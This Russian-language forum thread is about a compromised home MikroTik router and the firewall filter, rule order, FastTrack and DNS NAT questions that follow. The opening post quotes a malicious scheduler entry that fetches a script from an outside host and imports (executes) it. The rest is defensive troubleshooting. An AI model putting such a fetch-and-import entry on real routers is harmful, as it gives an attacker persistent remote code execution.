Неизвестная запись в System/Scheduler

[r136a8]

Добрый вечер. Сегодня настраивал отправку уведемлениий об появлении новой прошивки в telegram и обнаружил неизвестную запись в System/Scheduler

Код: Выделить всё

/tool fetch url=http://ciskotik.com/poll/4e24192a-ecb2-4a45-81bd-b0fb225410e5 mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08

https://imgur.com/a/NUUdwFq
Что это может быть?

[Sir_Prikol]

Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....

[r136a8]

Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....

Какой выход из таких ситуаций, правильный. Нужно заново перенас троить роутер? Или всего лишь удалить запись, но не известно ещё что-то может быть. И как защитится от подобного в будущем?

[Sir_Prikol]

Правильный - настройка фаервола, ограничения юзеров, запрет портов...

[r136a8]

Правильный - настройка фаервола, ограничения юзеров, запрет портов...

Мои настройки firewall filter, закрыты все порты кроме тех которые нужны для PPTP.

Код: Выделить всё

/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input comment=bestpratice dst-port=23023 protocol=tcp
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="Close all ports" in-interface=\
    ether9-WAN-E
add action=drop chain=input comment="Close all ports" in-interface=\
    ether1-WAN-V

Что можете посоветовать для firewall filter, по возможности дайте командную строку
Я нашел в сети вот нашел стандартные правила

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related routing-mark=main
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1

Сеть домашняя, юзеров как таковых нет, несколько пк через кабель и несколько устройств через cAP.
в настройках сети wifi
1) использую WPA2-PSK с aes-ccm шифрованием.
2) отключен WPS.
3) пароль 16 символов: большая буква, малая и цыфры
4) ограничен доступ по MAC-адресам в WiFi-сети.
5) снята галочка Default Forward в настройках wifi интерфейсах
6) скрыт SSID сети.
8) изменен MAC беспроводного интерфейса
что еще сделать?

[Chupaka]

Определённо взлом https://forum.nag.ru/index.php?/topic/1 ... -na-vzlom/

Доступ в Интернет — IPoE, безо всяких тоннелей? Что у вас за бриджи там? Интерфейсы ether1,9 в них не входят?

Более жёсткий вариант защиты, чем ваш — разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

[r136a8]

Да доступ по IPoE в оба порта
ether1 кабель от модема провайдера
ether9 кабель напрямую от провайдера.
Есть только PPTP на постоянной основе подключен один пк для использования VPN viewtopic.php?f=2&t=1938&p=4403#p4403

Относительно бриджей
Два бриджа на две сети/провайдера ether1,9 в них не входят!
https://imgur.com/a/eiaBAgM
Я думал что я полностью закрыт, по крайней мере Вы так мне говорили

[Chupaka]

PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили"

[r136a8]

PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили"

PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем. Вчера перенастроил роутер с нуля чтобы исключить чужие записи и сделал копию. Отправил Вам в личку полную конфигурацию роутера.
Извените не сильно понял, о чем Вы!

[Chupaka]

PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем.

Я выше написал, как побороть:

разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

Извените не сильно понял, о чем Вы!

О том месте, где я так говорил

[r136a8]

Мне нужен извне только PPTP ну и интернет
Как дропнуть все остальное?

А то, что мы закрыли все порты кроме тех, что нужны для PPTP. это не то что Вы имеете ввиду (разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

[Chupaka]

Как дропнуть все остальное?

Код: Выделить всё

/ip firewall filter add chain=input action=drop

А то, что мы закрыли все порты кроме тех, что нужны для PPTP. это не то что Вы имеете ввиду (разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

Нет. У вас сейчас настроено:
1) Разрешить через ether1 подключение по PPTP, остальное с ether1 дропнуть
2) Разрешить через ether9 подключение по PPTP, остальное с ether9 дропнуть
3) Всё остальное по умолчанию разрешено

Под третий пункт попадает как ваша локалка, так и ваш PPTP. И любой другой интерфейс, который может быть задействован в будущем под WAN.

[r136a8]

Мне получается нужно разместить это правила самим последним?

Код: Выделить всё

/ip firewall filter add chain=input action=drop

Все таки запутался. Если на wan ether1 и ether9 разрешено только PPTP а все остальное дропнуть то зачем делать что то еще так как остается только локалка?

Из того что прочитал вот тут о стандартных правилх Firewall https://weblance.com.ua/365-posledstviy ... nosti.html я сделал вот так:

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E

https://prnt.sc/mh3vyn
Правильно ли я сделал, проверьте пожалуйста правильность и очередность выполняемых правил.

Также после внесения изменений по ether9-WAN-E очень сильно упала скорость по кабелю. Нарузки на роутер нет.
Методом исключения (выключения всех и поочередно включением правил) выяснил, что скорость режет вот это правило (на данный момент я его отключил).

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

Спасибо

[Chupaka]

У вас три дырки в Интернет (ether1, ether9 и PPTP). По умолчанию всё разрешено, но две из них (ether1 и ether9) вы заткнули. Угадайте, почему третья дырка осталась открытой. Спойлер: потому что вы не добавили то правило, которое я вам дал.

[r136a8]

У вас три дырки в Интернет (ether1, ether9 и PPTP). По умолчанию всё разрешено, но две из них (ether1 и ether9) вы заткнули. Угадайте, почему третья дырка осталась открытой. Спойлер: потому что вы не добавили то правило, которое я вам дал.

Вот так, есть значение полследовательность всех этих правел? В такой последовательности и внесении вашего последнего правила из спойлера что вы мне давали, в бридже ether9-WAN-E пропадает интернет!
В ether1-WAN-V интернет есть!

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input

Это 2 правила можно удалить?

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

https://prnt.sc/mhgdkx

[Sir_Prikol]

Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в фаерволе ВСЕГДА имеют значение по очерёдности.

[r136a8]

Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в файрволле ВСЕГДА имеют значение по очерёдности.

Подскажите пожалуйста правильность расположения правил согласно моему листу правил.
А почему же в другой моей сети bridge2-NET-E пропадает интернет при добавлении вот этого правила

Код: Выделить всё

/ip firewall filter add chain=input action=drop

А относительно Фасттрак при активировании этих правил у меня очень падает скорость интернета. По bridge2-NET-E с 75Mb до 2 MB, по bridge1-NET-V с 170Mb до 60 Mb

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

[Chupaka]

"Пропадает Интернет" - это что значит? Юзеры ходят в Интернет через chain=forward, и то, что вы блокируете chain=input, вообще не должно влиять на хождение пакетов пользователей в Интернет.

Другое дело, что доступ из локалки к роутеру при необходимости бы оставить (например, если роутер является DNS-сервером для пользователей)

[r136a8]

"Пропадает Интернет" - это что значит? Юзеры ходят в Интернет через chain=forward, и то, что вы блокируете chain=input, вообще не должно влиять на хождение пакетов пользователей в Интернет.

Другое дело, что доступ из локалки к роутеру при необходимости бы оставить (например, если роутер является DNS-сервером для пользователей)

При активировании этого правила, выхода в интернет нет только на bridge2-NET-E на bridge1-NET-V все хорошо.
Отшибка Chrome
https://prnt.sc/mhgv1h

Доступ из локалки bridge2-NET-E к роутеро по winbox есть, и к сетевым дискам NAS также.

Очередность моих правил правильная?
Вот эти два я не включаю по причине сильного падения скорости интернета.

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

[Sir_Prikol]

Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в файрволле ВСЕГДА имеют значение по очерёдности.

Подскажите пожалуйста правильность расположения правил согласно моему листу правил.
А почему же в другой моей сети bridge2-NET-E пропадает интернет при добавлении вот этого правила

Код: Выделить всё

/ip firewall filter add chain=input action=drop

А относительно Фасттрак при активировании этих правил у меня очень падает скорость интернета. По bridge2-NET-E с 75Mb до 2 MB, по bridge1-NET-V с 170Mb до 60 Mb

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

Если вы имеете ввиду свой лист правил:

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input

то в нём я вообще не вижу PPTP интерфейса, я вижу только порт для PPTP, но никак не сам интерфейс
Читаем внимательно что написал мой коллега, и тогда правила будут более/менее в порядке

[r136a8]

Извените но совсем понимаю что мне надо сделать. Я окончательно запутался!

[Sir_Prikol]

У вас через фаервол фильтруются всего 2 интерфейса (ether1 и ether9) но не фильтруется pptp интерфейс

[r136a8]

У вас через фаервол фильтруются всего 2 интерфейса (ether1 и ether9) но не фильтруется pptp интерфейс

Мне нужно добавить вот такое правило?

Код: Выделить всё

/ip firewall filter
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=pptp-out1

И того у меня получается вот такие правила в такой последовательности

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=drop chain=input
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=pptp-out1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E

За исключением вот этих, они не активны так как снижают скорость интернета.

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

Выяснил почему после активации этого правила, у ПК который входил в bridge2-NET-E небыло интернета.

Код: Выделить всё

/ip firewall filter add chain=input action=drop

Потому что IP этого пк не проходил через родительский контроль. Хотя почему так, я имею ввиду получается все устройства должны проходить через сторонний DNS. Что с моим не так? У меня установлен 8.8.8.8

Код: Выделить всё

/ip firewall nat
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
    Kids-List to-addresses=77.88.8.7
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
    Kids-List to-addresses=77.88.8.3
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
    Parents-List to-addresses=176.103.130.130
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
    Parents-List to-addresses=176.103.130.130

[Sir_Prikol]

У вас на рутере какая-то каша не понятная, на сейчас я совсем запутался каким образом вы получаете интернет, как его раздаётё внутри сети, как разделили на подсети и что с маркировкой маршрутизации.

По сути (мне так кажется) у вас понапихано толпа разных правил из разных источников, причём напихано бездумно. Тут разгребать и разгребать